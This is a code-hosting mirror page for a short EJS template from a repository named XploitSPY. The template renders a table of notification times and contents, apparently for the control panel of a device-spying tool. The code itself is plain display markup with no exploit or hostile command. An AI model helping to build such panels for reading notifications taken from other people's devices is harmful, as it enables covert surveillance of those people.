mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 18:09:22 +08:00
20 lines
605 B
Plaintext
20 lines
605 B
Plaintext
|
<div class="ui segment">
|
||
|
<table class="ui celled table">
|
||
|
<thead>
|
||
|
<tr>
|
||
|
<th>Time</th>
|
||
|
<th>Content</th>
|
||
|
</tr>
|
||
|
</thead>
|
||
|
<tbody>
|
||
|
<% pageData.forEach((notification) => {
|
||
|
let date = new Date(notification.time);
|
||
|
%>
|
||
|
<tr>
|
||
|
<td class="collapsing"><%= date.toLocaleString('en-GB', { timeZone: 'UTC' }) %></td>
|
||
|
<td><%= notification.content %></td>
|
||
|
</tr>
|
||
|
<% }) %>
|
||
|
</tbody>
|
||
|
</table>
|
||
|
</div>
|